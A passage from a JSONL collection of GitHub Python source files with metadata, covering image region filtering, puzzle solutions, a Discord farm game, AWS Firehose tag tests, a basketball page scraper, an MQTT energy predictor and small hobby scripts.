len(border_region_coords) != 0:\n excluded_border_img[border_region_coords[:, 0], border_region_coords[:, 1]] = 0\n excluded_border_img *= filtered_img\n # Remove small regions\n exclude_small_img = np.zeros_like(ratio_img)\n excluded_small_coords = np.array([coord.tolist() for region in [region for region in props if region.area > 0.01*width*height]\n for coord in region.coords])\n exclude_small_img[excluded_small_coords[:, 0], excluded_small_coords[:, 1]] = 1\n # Only most central white region\n cx = width/2\n cy = height/2\n dx = width/5\n dy = height/5\n center_region_img = np.zeros_like(ratio_img)\n for region in props:\n keep = False\n for coord in region.coords:\n if cx - dx <= coord[0] <= cx + dx and cy - dy <= coord[1] <= cy + dy:\n keep = True\n break\n if keep:\n for coord in region.coords:\n center_region_img[coord[0], coord[1]] = 1\n # # Exclude regions with high saturation\n # hsv_img = HsvTransform().process(ratio_img)\n # filtered_hsv_img = hsv_img[:, :, 1] < 0.5\n # Combine images\n result = (exclude_small_img + excluded_border_img + largest_region_img + center_region_img) >= 3\n if show:\n print(\"Show of largest region\")\n ImagePlot().show(\"\", largest_region_img)\n print(\"Show of exclusion border\")\n ImagePlot().show(\"\", excluded_border_img)\n print(\"Show of removal small regions\")\n ImagePlot().show(\"\", exclude_small_img)\n print(\"Show of retaining center regions\")\n ImagePlot().show(\"\", center_region_img)\n # print(\"Filtered hsv image\")\n # ImagePlot().show(\"\", filtered_hsv_img)\n print(\"Show of result\")\n ImagePlot().show(\"TADA!\", result)\n\n return result\n","repo_name":"Zepheus/ml-traffic","sub_path":"features/color_feature.py","file_name":"color_feature.py","file_ext":"py","file_size_in_byte":7847,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"37037640008","text":"from collections import deque\n\n\ndef parse_input(file):\n data = open(file, \"r\").read().strip()\n data = [x for x in data.split(\"\\n\")]\n return data\n\n\ndef get_bliz_locs(g):\n # creates a dict with key of time (t)\n # contains locations of blizzards at next time (t + 1)\n # those are unsafe spots to move\n # because it will repeat, we only need enough entries for\n # the cycle which is height * width of area of field\n height = len(g)\n width = len(g[0])\n bliz_locs = {}\n for t in range(((height - 2) * (width - 2) + 1)):\n unsafe_locs = set()\n for row in range(height):\n for col in range(width):\n curr_item = g[row][col]\n if curr_item == \">\":\n unsafe_locs.add((row, 1 + ((col - 1 + t) % (width - 2))))\n elif curr_item == \"<\":\n unsafe_locs.add((row, 1 + ((col - 1 - t) % (width - 2))))\n elif curr_item == \"v\":\n unsafe_locs.add((1 + ((row - 1 + t) % (height - 2)), col))\n elif curr_item == \"^\":\n unsafe_locs.add((1 + ((row - 1 - t) % (height - 2)), col))\n bliz_locs[t] = unsafe_locs\n return bliz_locs\n\n\ntest_inp = \"test.txt\"\npuzz_inp = \"2022/inputs/24.txt\"\ncurr_inp = puzz_inp\n\ngrid = parse_input(curr_inp)\nmax_rows = len(grid)\nmax_cols = len(grid[0])\n\n# populate bliz_locs dict\nbliz_locs = get_bliz_locs(grid)\n\n# find start location\nr = 0\nc = grid[r].index(\".\")\n\nseen_states = set()\nstart_state = (r, c, 0, False, False) # row, col, time, seen_end, seen_start\nstates = deque([start_state])\npart1_finished = False\nwhile states:\n (row, col, time, seen_end, seen_start) = states.popleft()\n # if it isn't a valid spot, ignore it\n # need this because we don't check when adding states\n if not (0 <= row < max_rows and 0 <= col < max_cols and grid[row][col] != \"#\"):\n continue\n # once we are at the end,\n # and have already been to the end and back to start,\n # we are done with part 2\n if row == max_rows - 1 and seen_start and seen_end:\n print(\"Part 2:\", time)\n break\n # first time we reach the end, print result for part 1\n if row == max_rows - 1 and (not part1_finished):\n print(\"Part 1:\", time)\n part1_finished = True\n # mark when we've seen the end\n if row == max_rows - 1:\n seen_end = True\n # if we have already seen the end, mark if we got back to start\n if row == 0 and seen_end:\n seen_start = True\n\n # keep track of states we have already processed to avoid duplicates\n if (row, col, time, seen_end, seen_start) in seen_states:\n continue\n seen_states.add((row, col, time, seen_end, seen_start))\n\n # get where blizzards will be at next time (time cycles by area of field)\n bliz_time = time % ((max_rows - 2) * (max_cols - 2))\n avoid_locs = bliz_locs[bliz_time + 1]\n\n # can we stay put?\n if (row, col) not in avoid_locs:\n states.append((row, col, time + 1, seen_end, seen_start))\n # can we move right?\n if (row, col + 1) not in avoid_locs:\n states.append((row, col + 1, time + 1, seen_end, seen_start))\n # can we move left?\n if (row, col - 1) not in avoid_locs:\n states.append((row, col - 1, time + 1, seen_end, seen_start))\n # can we move up?\n if (row - 1, col) not in avoid_locs:\n states.append((row - 1, col, time + 1, seen_end, seen_start))\n # can we move down?\n if (row + 1, col) not in avoid_locs:\n states.append((row + 1, col, time + 1, seen_end, seen_start))\n","repo_name":"MattMichaud/AoC","sub_path":"2022/code/24.py","file_name":"24.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12449332000","text":"\ndef solve(s):\n global ans # 바꾸어야 할 변수는 글로벌 선언\n for p in possible:\n now = s + str(p)\n ans = min(ans, len(now)+abs(n-int(now)))\n if len(now) < 6:\n solve(now)\n\nn = int(input())\nm = int(input())\nans = abs(n-100) # 100에서 +-만 눌러서 가는 방법\nif m: # 고장난 버튼이 있는 경우\n broken = list(map(int, input().split()))\n # 고장나지 않은 버튼만 구하기 (set을 이용하자!)\n possible = set(i for i in range(10))-set(broken)\n solve('')\nelse: # 고장난 버튼이 없는 경우\n ans = min(ans, len(str(n)))\n\n\nprint(ans)\n","repo_name":"yujing-kim/algorithm_coding_test","sub_path":"ps_python/joon/1107.py","file_name":"1107.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1866694465","text":"from bot.database.models import Farm as FarmModel\nfrom bot.database.models import PlantedCrop\nfrom bot.game.crop import Crop\nfrom bot.utils.constants import (\n FarmSizes,\n FARM_DIMENSIONS,\n PlotCoordinate,\n PlotActions,\n CROP_DATA,\n)\nfrom discord import Embed\nfrom typing import List, Optional\n\n\nclass Farm:\n def __init__(self, farm_id: int, size: FarmSizes, name: str):\n self.id = farm_id\n self.name = name\n self.size = size\n self.dimensions = FARM_DIMENSIONS.get(self.size)\n self.plot: List[List] = self.initialize_plot()\n\n @classmethod\n async def load(cls, player_id: int) -> \"Farm\":\n farm_model = await FarmModel.query.where(\n FarmModel.player_id == player_id\n ).gino.first()\n if farm_model is None:\n farm_model = await FarmModel.create(player_id=player_id)\n farm = Farm(\n farm_id=farm_model.id, size=FarmSizes(farm_model.size), name=farm_model.name\n )\n await farm.load_crops()\n return farm\n\n def initialize_plot(self) -> List[List[Optional[Crop]]]:\n return [\n [None for _ in range(self.dimensions.rows)]\n for _ in range(self.dimensions.columns)\n ]\n\n async def load_crops(self):\n crops = await PlantedCrop.query.where(PlantedCrop.farm_id == self.id).gino.all()\n for crop in crops:\n self.place_crop(\n Crop(\n id=crop.id,\n farm_id=crop.farm_id,\n crop_id=crop.crop_id,\n planted_at=crop.planted_at,\n ),\n row=crop.coord_row,\n column=crop.coord_column,\n )\n\n def validate_coordinate(self, row: int = None, column: int = None):\n if row is not None:\n if row >= self.dimensions.rows or row < 0:\n return False\n if column is not None:\n if column >= self.dimensions.columns or column < 0:\n return False\n return True\n\n def place_crop(self, crop: Crop, row: int, column: int):\n if not self.validate_coordinate(row=row, column=column):\n raise ValueError(\"Crop placement out of bounds\")\n self.plot[row][column] = crop\n\n async def work_plot(self, action: PlotActions, row: int, column: int, crop_id: int):\n if not self.validate_coordinate(row, column):\n return\n if self.plot[row][column] is not None:\n\n await self.plot[row][column].work(action)\n else:\n if action is PlotActions.PLANT:\n self.plot[row][column] = await Crop.new(\n farm_id=self.id, crop_id=crop_id, row=row, column=column\n )\n\n async def work_plots(\n self,\n action: PlotActions,\n coordinates: List[PlotCoordinate],\n crop_id: int = None,\n ):\n if not coordinates:\n for row in range(self.dimensions.rows):\n for column in range(self.dimensions.columns):\n await self.work_plot(\n action=action, row=row, column=column, crop_id=crop_id\n )\n\n for coordinate in coordinates:\n await self.work_plot(\n action=action,\n row=coordinate.row,\n column=coordinate.column,\n crop_id=crop_id,\n )\n\n def display(self):\n farm_land = \"\"\n for row in self.plot:\n for crop in row:\n if crop is None:\n farm_land += \"<:Crop_Land:753444938791911474>\" # Dirt Emoji\n continue\n farm_land += CROP_DATA[str(crop.crop_id)][\"stages\"][crop.state][\"emote\"]\n farm_land += \"\\n\"\n embed = Embed(title=self.name, description=farm_land)\n return embed\n\n def get_plots(self, planted: bool = True):\n crops = []\n for crop_row, row in enumerate(self.plot):\n for crop_column, crop in enumerate(row):\n if planted and crop is not None:\n crops.append(PlotCoordinate(crop_row, crop_column))\n else:\n if not planted and crop is None:\n crops.append(PlotCoordinate(crop_row, crop_column))\n return crops if crops else None\n","repo_name":"DiscordValley/TheValley","sub_path":"bot/game/farm.py","file_name":"farm.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"9972328897","text":"import json\nimport hashlib\n\nfrom moban import constants, exceptions\nfrom moban.externals import file_system\n\n\nclass HashStore:\n IGNORE_CACHE_FILE = False\n\n def __init__(self):\n self.cache_file = constants.DEFAULT_MOBAN_CACHE_FILE\n if (\n file_system.exists(self.cache_file)\n and self.IGNORE_CACHE_FILE is False\n ):\n with file_system.open_file(self.cache_file) as f:\n self.hashes = json.load(f)\n else:\n self.hashes = {}\n\n def is_file_changed(self, file_name, file_content, source_template):\n changed, with_permission = self._is_source_updated(\n file_name, file_content, source_template\n )\n\n if changed is False:\n target_hash = get_file_hash(\n file_name, with_permission=with_permission\n )\n if target_hash != self.hashes[file_name]:\n changed = True\n return changed\n\n def _is_source_updated(self, file_name, file_content, source_template):\n changed = True\n content = file_content\n with_permission = True\n try:\n content = _mix(\n file_content,\n oct(file_system.file_permissions(source_template)),\n )\n except exceptions.NoPermissionsNeeded:\n # HttpFs does not have getsyspath\n # zip, tar have no permission\n # win32 does not work\n with_permission = False\n pass\n content_hash = get_hash(content)\n if file_system.exists(file_name):\n if file_name in self.hashes:\n if content_hash == self.hashes[file_name]:\n changed = False\n # else the dest file has not been created yet\n # so no need to get content hash at all\n if changed:\n self.hashes[file_name] = content_hash\n\n return changed, with_permission\n\n def save_hashes(self):\n with open(self.cache_file, \"w\") as f:\n json.dump(self.hashes, f)\n\n\nHASH_STORE = HashStore()\n\n\ndef get_file_hash(afile, with_permission=True):\n content = file_system.read_bytes(afile)\n try:\n if with_permission:\n content = _mix(content, oct(file_system.file_permissions(afile)))\n except exceptions.NoPermissionsNeeded:\n # HttpFs does not have getsyspath\n # zip, tar have no permission\n # win32 does not work\n pass\n return get_hash(content)\n\n\ndef get_hash(content):\n md5 = hashlib.md5()\n md5.update(content)\n return md5.digest().decode(\"latin1\")\n\n\ndef _mix(content, file_permissions_copy):\n file_permissions_copy = file_permissions_copy.encode(\"utf-8\")\n return content + file_permissions_copy\n","repo_name":"moremoban/moban","sub_path":"moban/core/hashstore.py","file_name":"hashstore.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"1716027567","text":"from datetime import datetime\nimport argparse\n\nfrom cassandra.cluster import Cluster\nimport requests\n\nfrom BasketballReferencePageTextSchema import BasketballReferencePageTextSchema\nfrom BasketballReferenceScrapeStatusSchema import BasketballReferenceScrapeStatusSchema\nfrom CassandraQueryBuilder import CassandraQueryBuilder\nfrom CassandraTables import CassandraTables\n\n\n__author__ = 'Ryan'\n\n\"\"\"\nCREATE TABLE nba.basketball_reference_page_text_table (\ngameid text,\ntype text,\npage text,\nscrapedate text,\nPRIMARY KEY (type, gameid)\n);\n\n\"\"\"\n\n\nclass BasketballReferencePageScraper:\n def __init__(self):\n self.cluster = Cluster()\n self.session = self.cluster.connect(CassandraTables.KEYSPACE_NBA)\n self.scrapeDate = str(datetime.today())\n\n\n def process(self, pageType):\n column = self.getColumnFromPageType(pageType)\n gameids = self.selectSource(column)\n links = self.selectLinks(gameids)\n for r in links:\n self.extractPage(r, pageType, column)\n\n\n def extractPage(self, row, pageType, column):\n r = requests.get(row.boxscorelink)\n self.writePageToTable(row.gameid, pageType, r.text)\n self.updateSourceTable(row.gameid, column)\n\n\n def updateSourceTable(self, gameId, column):\n self.session.execute(\n CassandraQueryBuilder.updateQueryBuilder(CassandraTables.BASKETBALLREFERENCE_SCRAPE_STATUS_TABLE,\n \"{0}=$${1}$$\".format(column, self.scrapeDate),\n [\"gameid=\\'{0}\\'\".format(gameId)]))\n\n def writePageToTable(self, gameId, pageType, text):\n self.session.execute(\n CassandraQueryBuilder.insertInto(CassandraTables.BASKETBALLREFERENCE_PAGE_TEXT,\n BasketballReferencePageTextSchema.toHeader(),\n [gameId, pageType, text, self.scrapeDate]\n )\n )\n\n def selectLinks(self, gameids):\n return self.session.execute(\n CassandraQueryBuilder.selectFrom(CassandraTables.BASKETBALLREFERENCE_GAME_LINKS_TABLE,\n ['gameid', 'boxscorelink'],\n [CassandraQueryBuilder.inClause('gameid', gameids)]))\n\n def selectSource(self, column):\n source = self.session.execute(\n CassandraQueryBuilder.selectFrom(CassandraTables.BASKETBALLREFERENCE_SCRAPE_STATUS_TABLE,\n ['gameid'],[column + \"=''\"]))\n return [r.gameid for r in source.current_rows]\n\n def getColumnFromPageType(self, pageType):\n if pageType == \"BoxScore\":\n return BasketballReferenceScrapeStatusSchema.boxscore_scrapedate\n elif pageType == \"PlayByPlay\":\n return BasketballReferenceScrapeStatusSchema.play_by_play_scrapedate\n elif pageType == \"ShotChart\":\n return BasketballReferenceScrapeStatusSchema.shotchart_scrapedate\n else:\n raise ValueError(\"The pageType provided is not a valid pageType\")\n\n\ndef main(argv):\n BSS = BasketballReferencePageScraper()\n if argv['run_all']:\n argv['playbyplay'] = True\n argv['boxscore'] = True\n argv['shotchart'] = True\n\n if argv['playbyplay']:\n BSS.process(\"PlayByPlay\")\n if argv['boxscore']:\n BSS.process(\"BoxScore\")\n if argv['shotchart']:\n BSS.process(\"ShotChart\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-ra', '--run-all', help='Will run all three page extractors (BoxScore, ShotChart, PlayByPlay)',\n action=\"store_true\", default=False)\n parser.add_argument('-bs', '--boxscore', help='Scrape all new boxscore links', action=\"store_true\", default=False)\n parser.add_argument('-sc', '--shotchart', help='Scrape all new shotchart links', action=\"store_true\", default=False)\n parser.add_argument('-pbp', '--playbyplay', help='Scrape all new playbyplay links', action=\"store_true\",\n default=False)\n results = vars(parser.parse_args())\n main(results)\n\n","repo_name":"rd11490/NBA","sub_path":"NBAProject/BasketballReferencePageScraper.py","file_name":"BasketballReferencePageScraper.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"33231228282","text":"import os\n\nos.chdir('/home/eugenegalaxy/Documents/projects/simp/simp/tests/yolo_dataset/mask_incorrect_detections')\nCOUNT = 0\n\n\ndef increment():\n global COUNT\n COUNT = COUNT + 1\n\n\ndef renamer():\n for f in os.listdir():\n f_name, f_ext = os.path.splitext(f)\n f_name = 'nofever_{0:04}'.format(COUNT)\n increment()\n\n new_name = '{}{}'.format(f_name, f_ext)\n os.rename(f, new_name)\n\n\ndef renamer_parts():\n for f in os.listdir():\n f_name, f_ext = os.path.splitext(f)\n # f_name = 'something'\n parts = f_name.split('height')\n f_name = parts[0]\n parts2 = f_name.split('_')\n f_name = '{0:04}'.format(COUNT) + '_old_' + parts2[1] + '_' + parts2[2]\n new_name = '{}{}'.format(f_name, f_ext)\n os.rename(f, new_name)\n increment()\n\n\nrenamer_parts()\n","repo_name":"eugenegalaxy/simp","sub_path":"simp/file_renamer.py","file_name":"file_renamer.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10853763740","text":"import numpy as np\nfrom time import time\nfrom datasphere.populate import init_data_sphere\nimport getpass, os, sys\n\ndef test_populate_init_data_sphere():\n \n Nx=3\n Ny=5\n Nz=7\n ZZ=np.arange(Nz, dtype=np.float64)\n YY=np.arange(Ny, dtype=np.float64)\n XX=np.arange(Nx, dtype=np.float64)\n\n print(XX,YY,ZZ)\n voxel_size=np.array([1.], dtype=np.float64)\n\n # (1) compute the result using our C extension\n t0 = time()\n out = init_data_sphere(ZZ, YY, XX,voxel_size)\n dt0 = time() - t0\n print(\"XX={}\".format(XX))\n print(\"XX shape={}\".format(XX.shape))\n print(\"out={}\".format(out))\n print(\"out.shape={}\".format(out.shape))\n\n\n# MAIN\nif __name__ == \"__main__\":\n test_populate_init_data_sphere()\n\n\n\n\n\n","repo_name":"a356617605/Datasphere","sub_path":"test_populate.py","file_name":"test_populate.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9971521811","text":"from SEIL_Energy import *\nimport paho.mqtt.client as mqtt\nimport MySQLdb\nfrom config import CONFIG\n# Open database connection\ndb = MySQLdb.connect(CONFIG[\"database\"][\"host\"],CONFIG[\"database\"][\"user\"],CONFIG[\"database\"][\"password\"],CONFIG[\"database\"][\"name\"] )\n\n# prepare a cursor object using cursor() method\ncursor = db.cursor()\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n client.subscribe(CONFIG[\"mqtt\"][\"topic\"])\n\nqueue = []\n# The callback for when a PUBLISH message is received from the server.\ndef on_message(client, userdata, msg):\n # print(msg.topic+\" \"+str(msg.payload))\n actual_value = str(msg.payload).split(',')[2]\n ts = int(float(str(msg.payload).split(',')[1]))\n # print(\"ts\",ts)\n if len(queue)<6:\n queue.append(actual_value)\n return\n predicted_value = energy_pred_LSTM(queue)\n queue.pop(0)\n queue.append(actual_value)\n print(predicted_value, actual_value)\n sql = \"insert into predicted_power(ts,predicted_value) values(\"+str(ts)+\", \"+str(predicted_value)+\")\"\n try:\n # Execute the SQL command\n cursor.execute(sql)\n # Commit your changes in the database\n db.commit()\n except:\n # Rollback in case there is any error\n db.rollback()\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(CONFIG[\"mqtt\"][\"host\"], CONFIG[\"mqtt\"][\"port\"], 60)\n\n# Blocking call that processes network traffic, dispatches callbacks and\n# handles reconnecting.\n# Other loop*() functions are available that give a threaded interface and a\n# manual interface.\nclient.loop_forever()","repo_name":"seil-cse-iitb/energy-prediction","sub_path":"live_prediction.py","file_name":"live_prediction.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32306336341","text":"\"\"\"Unit tests verifying tag-related delivery stream APIs.\"\"\"\nimport boto3\nfrom botocore.exceptions import ClientError\nimport pytest\n\nfrom moto import mock_firehose\nfrom moto.core import DEFAULT_ACCOUNT_ID as ACCOUNT_ID\nfrom moto.firehose.models import MAX_TAGS_PER_DELIVERY_STREAM\nfrom moto.moto_api._internal import mock_random\nfrom tests.test_firehose.test_firehose import TEST_REGION\nfrom tests.test_firehose.test_firehose import sample_s3_dest_config\n\n\n@mock_firehose\ndef test_list_tags_for_delivery_stream():\n \"\"\"Test invocations of list_tags_for_delivery_stream().\"\"\"\n client = boto3.client(\"firehose\", region_name=TEST_REGION)\n stream_name = f\"test_list_tags_{mock_random.get_random_hex(6)}\"\n\n number_of_tags = 50\n tags = [{\"Key\": f\"{x}_k\", \"Value\": f\"{x}_v\"} for x in range(1, number_of_tags + 1)]\n\n # Create a delivery stream to work with.\n client.create_delivery_stream(\n DeliveryStreamName=stream_name,\n S3DestinationConfiguration=sample_s3_dest_config(),\n Tags=tags,\n )\n\n # Verify limit works.\n result = client.list_tags_for_delivery_stream(\n DeliveryStreamName=stream_name, Limit=1\n )\n assert len(result[\"Tags\"]) == 1\n assert result[\"Tags\"] == [{\"Key\": \"1_k\", \"Value\": \"1_v\"}]\n assert result[\"HasMoreTags\"] is True\n\n result = client.list_tags_for_delivery_stream(\n DeliveryStreamName=stream_name, Limit=number_of_tags\n )\n assert len(result[\"Tags\"]) == number_of_tags\n assert result[\"HasMoreTags\"] is False\n\n # Verify exclusive_start_tag_key returns truncated list.\n result = client.list_tags_for_delivery_stream(\n DeliveryStreamName=stream_name, ExclusiveStartTagKey=\"30_k\"\n )\n assert len(result[\"Tags\"]) == number_of_tags - 30\n expected_tags = [\n {\"Key\": f\"{x}_k\", \"Value\": f\"{x}_v\"} for x in range(31, number_of_tags + 1)\n ]\n assert result[\"Tags\"] == expected_tags\n assert result[\"HasMoreTags\"] is False\n\n result = client.list_tags_for_delivery_stream(\n DeliveryStreamName=stream_name, ExclusiveStartTagKey=f\"{number_of_tags}_k\"\n )\n assert len(result[\"Tags\"]) == 0\n assert result[\"HasMoreTags\"] is False\n\n # boto3 ignores bad stream names for ExclusiveStartTagKey.\n result = client.list_tags_for_delivery_stream(\n DeliveryStreamName=stream_name, ExclusiveStartTagKey=\"foo\"\n )\n assert len(result[\"Tags\"]) == number_of_tags\n assert result[\"Tags\"] == tags\n assert result[\"HasMoreTags\"] is False\n\n # Verify no parameters returns entire list.\n client.list_tags_for_delivery_stream(DeliveryStreamName=stream_name)\n assert len(result[\"Tags\"]) == number_of_tags\n assert result[\"Tags\"] == tags\n assert result[\"HasMoreTags\"] is False\n\n\n@mock_firehose\ndef test_tag_delivery_stream():\n \"\"\"Test successful, failed invocations of tag_delivery_stream().\"\"\"\n client = boto3.client(\"firehose\", region_name=TEST_REGION)\n\n # Create a delivery stream for testing purposes.\n stream_name = f\"test_tags_{mock_random.get_random_hex(6)}\"\n client.create_delivery_stream(\n DeliveryStreamName=stream_name,\n ExtendedS3DestinationConfiguration=sample_s3_dest_config(),\n )\n\n # Unknown stream name.\n unknown_name = \"foo\"\n with pytest.raises(ClientError) as exc:\n client.tag_delivery_stream(\n DeliveryStreamName=unknown_name, Tags=[{\"Key\": \"foo\", \"Value\": \"bar\"}]\n )\n err = exc.value.response[\"Error\"]\n assert err[\"Code\"] == \"ResourceNotFoundException\"\n assert (\n f\"Firehose {unknown_name} under account {ACCOUNT_ID} not found\"\n in err[\"Message\"]\n )\n\n # Too many tags.\n with pytest.raises(ClientError) as exc:\n client.tag_delivery_stream(\n DeliveryStreamName=stream_name,\n Tags=[{\"Key\": f\"{x}\", \"Value\": f\"{x}\"} for x in range(51)],\n )\n err = exc.value.response[\"Error\"]\n assert err[\"Code\"] == \"ValidationException\"\n assert (\n f\"failed to satisify contstraint: Member must have length \"\n f\"less than or equal to {MAX_TAGS_PER_DELIVERY_STREAM}\"\n ) in err[\"Message\"]\n\n # Bad tags.\n with pytest.raises(ClientError) as exc:\n client.tag_delivery_stream(\n DeliveryStreamName=stream_name, Tags=[{\"Key\": \"foo!\", \"Value\": \"bar\"}]\n )\n err = exc.value.response[\"Error\"]\n assert err[\"Code\"] == \"ValidationException\"\n assert (\n \"1 validation error detected: Value 'foo!' at 'tags.1.member.key' \"\n \"failed to satisfy constraint: Member must satisfy regular \"\n \"expression pattern\"\n ) in err[\"Message\"]\n\n # Successful addition of tags.\n added_tags = [\n {\"Key\": f\"{x}\", \"Value\": f\"{x}\"} for x in range(MAX_TAGS_PER_DELIVERY_STREAM)\n ]\n client.tag_delivery_stream(DeliveryStreamName=stream_name, Tags=added_tags)\n results = client.list_tags_for_delivery_stream(DeliveryStreamName=stream_name)\n assert len(results[\"Tags\"]) == MAX_TAGS_PER_DELIVERY_STREAM\n assert results[\"Tags\"] == added_tags\n\n\n@mock_firehose\ndef test_untag_delivery_stream():\n \"\"\"Test successful, failed invocations of untag_delivery_stream().\"\"\"\n client = boto3.client(\"firehose\", region_name=TEST_REGION)\n\n # Create a delivery stream for testing purposes.\n stream_name = f\"test_untag_{mock_random.get_random_hex(6)}\"\n tag_list = [\n {\"Key\": \"one\", \"Value\": \"1\"},\n {\"Key\": \"two\", \"Value\": \"2\"},\n {\"Key\": \"three\", \"Value\": \"3\"},\n ]\n client.create_delivery_stream(\n DeliveryStreamName=stream_name,\n ExtendedS3DestinationConfiguration=sample_s3_dest_config(),\n Tags=tag_list,\n )\n\n # Untag all of the tags. Verify there are no more tags.\n tag_keys = [x[\"Key\"] for x in tag_list]\n client.untag_delivery_stream(DeliveryStreamName=stream_name, TagKeys=tag_keys)\n results = client.list_tags_for_delivery_stream(DeliveryStreamName=stream_name)\n assert not results[\"Tags\"]\n assert not results[\"HasMoreTags\"]\n","repo_name":"getmoto/moto","sub_path":"tests/test_firehose/test_firehose_tags.py","file_name":"test_firehose_tags.py","file_ext":"py","file_size_in_byte":5953,"program_lang":"python","lang":"en","doc_type":"code","stars":7174,"dataset":"github-code","pt":"48"} +{"seq_id":"19882159694","text":"import math\r\nimport pygame\r\n\r\npygame.init()\r\n\r\nglobal w, h, vo, theta\r\n\r\nw,h = 1024,1024\r\nscreen = pygame.display.set_mode((w,h))\r\ndef findVelocity(a = 9.8):\r\n global vox, voy, time, distance, vo\r\n vo = input('enter initial velocity(m/s):>')\r\n theta = input('enter angle(degrees):>')\r\n vo = int(vo)\r\n theta = int(theta)\r\n #convert theta to radians\r\n theta = math.radians(theta)\r\n #perform trig \r\n costheta = math.cos(theta)\r\n sintheta = math.sin(theta)\r\n #find x and y velocity\r\n vo = math.radians(vo)\r\n vox = vo * costheta \r\n voy = vo * sintheta\r\n #convert to degrees\r\n vox = math.degrees(vox)\r\n voy = math.degrees(voy)\r\n main()\r\n\r\ndef finish(a = 9.8):\r\n print('a =', a, 'm/s^2')\r\n print('Initial velocity =', vo, 'm/s')\r\n print('Vox = ', vox , 'm/s')\r\n print('Voy = ', voy , 'm/s')\r\n tt= voy * -2\r\n t = tt / a\r\n time = t * -1\r\n distance = vox * time\r\n print('projectile traveled', distance, 'meters in', time, 'seconds')\r\n\r\n\r\ndef main(a = 9.8, hdamp = 0.1, damp = 0.1):\r\n ball_x = 1018\r\n ball_y = 1018\r\n ball_x_v = int(vox)\r\n ball_y_v = int(voy)\r\n ball_y = int(ball_y)\r\n ball_x_v = int(ball_x_v)\r\n ball_y_v = int(ball_y_v)\r\n screen = pygame.display.set_mode((w,h))\r\n\r\n count = 0\r\n \r\n while True:\r\n\r\n screen.fill((0,0,0))\r\n\r\n\r\n if ball_x <= 0:\r\n\r\n ball_x_v = -ball_x_v*(1-damp)\r\n ball_x = 1\r\n ball_x = 1024\r\n if ball_y <= 0:\r\n\r\n ball_y_v = -ball_y_v*(1-damp)\r\n ball_x_v = ball_x_v*(1-hdamp)\r\n ball_y = 1\r\n ball_y = 1024\r\n if ball_x >= w:\r\n\r\n ball_x_v = -ball_x_v*(1-damp)\r\n\r\n #ball_x = ball_x - ball_x\r\n\r\n #print(ball_x)\r\n \r\n\r\n if ball_y >=h:\r\n ball_y_v = -ball_y_v*(1-damp)\r\n \r\n ball_y = h - 1\r\n #print('landing coordinates: ', ball_x, ' ', ball_y)\r\n \r\n \r\n\r\n \r\n oldposx = ball_x\r\n oldposy = ball_y\r\n ball_x += ball_x_v\r\n ball_y += ball_y_v\r\n ball_y_v += (a / 125)\r\n #print(ball_x, ball_y)\r\n print()\r\n \r\n \r\n pygame.draw.circle(screen, (255,255,255), (int(ball_x), int(ball_y)), 5)\r\n\r\n pygame.display.update()\r\n\r\nif __name__ == '__main__':\r\n\r\n findVelocity()\r\n","repo_name":"waddyado/2dphysics","sub_path":"simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31322624783","text":"from os import system\nimport functions.banco as b\n\n\ndef main():\n clientes = []\n contas = []\n\n while True:\n opcao = b.menu()\n\n if opcao == 'd':\n b.depositar(clientes)\n\n elif opcao == 's':\n b.sacar(clientes)\n\n elif opcao == 'e':\n b.exibir_extrato(clientes)\n\n elif opcao == 'nu':\n b.criar_cliente(clientes)\n\n elif opcao == 'nc':\n numero_conta = len(contas) + 1\n b.criar_conta(numero_conta, clientes, contas)\n\n elif opcao == 'lc':\n b.listar_contas(contas)\n\n elif opcao == 'l':\n system('cls')\n\n elif opcao == 'q':\n break\n\n else:\n print(f'\\n{ \" Operação inválida, por favor selecione novamente a operação desejada. \".center(100, \"@\") }')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"GuilhermeDGDEV/DIO_sistema_bancario_python_poo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41546346316","text":"if __name__ == '__main__':\n from random import randint\n import os\n from time import sleep\n\n TAMANHO_GRID = 10 # Tamanho do grid do jogo\n PACMAN = ['O', 'o'] # Lista com as formas do pacman a cada interação\n COMIDA = 'X' # Formato da comida\n TEMPO_DA_INTERACAO = 0.5 # Tempo entre as interações de movimento do pacman\n\n pos_pacman = [randint(0, TAMANHO_GRID - 1), randint(0, TAMANHO_GRID - 1)] # Sortear posição que o pacman vai ficar no jogo\n pos_comida = [randint(0, TAMANHO_GRID - 1), randint(0, TAMANHO_GRID - 1)] # Sortear posição que vai ficar a comida no jogo\n\n pacman_formato = PACMAN[0] # Formato do primeiro pacman no jogo\n\n # Imprimindo o jogo na tela\n def imprimir_grid():\n os.system('cls')\n for l in range(TAMANHO_GRID): # percorre as linhas do jogo - 